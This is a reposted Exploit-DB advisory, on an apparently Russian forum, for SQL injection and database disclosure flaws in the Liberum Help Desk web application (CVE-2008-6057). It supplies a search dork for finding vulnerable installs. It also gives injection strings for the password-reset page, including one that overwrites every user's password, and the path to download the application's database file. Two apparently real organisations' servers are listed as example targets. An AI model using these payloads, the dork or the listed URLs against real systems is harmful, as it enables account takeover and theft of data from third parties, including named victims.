- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 7493
- Проверка EDB
-
- Пройдено
- Автор
- COLD ZERO
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-6057
- Дата публикации
- 2008-12-16
Код:
Liberum Help Desk (SQL/DD) Multiple Remote Vulnerabilities
author : Cold z3ro, www.hackteach.org
Dork : "Liberum Help Desk, Copyright (C) 2001 Doug Luxem"
==============
[#] SQL Injection
http://www.site.com/[path]/forgotpass.asp
In uid insert SQL command's =>
SCMD ==> ' or '1=1
SCMD ==> ' or 'update tblusers set password = "z3ro"
all passwords will be z3ro
=============
[#] Database Disclosure
http://www.site.com/[path]/db/helpdesk2000.mdb
example :
https://www.bauer.uh.edu/helpdesk/db/helpdesk2000.mdb
http://www.ags2.com/helpdesk/db/helpdesk2000.mdb
# milw0rm.com [2008-12-16]- Источник
- www.exploit-db.com
